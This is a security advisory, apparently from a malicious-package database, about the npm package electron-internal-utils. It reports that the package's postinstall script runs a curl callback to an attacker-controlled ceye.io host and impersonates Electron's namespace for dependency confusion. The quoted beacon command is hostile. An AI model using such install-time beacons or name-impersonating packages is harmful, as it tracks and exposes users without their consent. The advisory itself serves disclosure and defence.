—

MAL-2026-6186

Malicious code in electron-internal-utils (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e07ff16a8f4a44a8ccfc2f6f2a91eee6dbd3d1de9f1c4d6ca95e0e48999202ef) On npm install, package.json's postinstall script executes `curl http://9ph8dp.ceye.io`, an out-of-band DNS/HTTP interaction service controlled by the package author. The callback signals the attacker that the package was installed on the host and leaks the installer's public IP and DNS resolver metadata. The package ships no functionality (index.js contains only `module.exports = {};`) and its name impersonates the Electron project's internal-utilities namespace, consistent with a dependency-confusion attack against projects that reference internal Electron helpers. Any environment that runs `npm install` on this package will silently beacon to attacker-controlled infrastructure.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / electron-internal-utils

No fixed version published yet for electron-internal-utils (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/electron-internal-utils/v/1.0.0 [PACKAGE]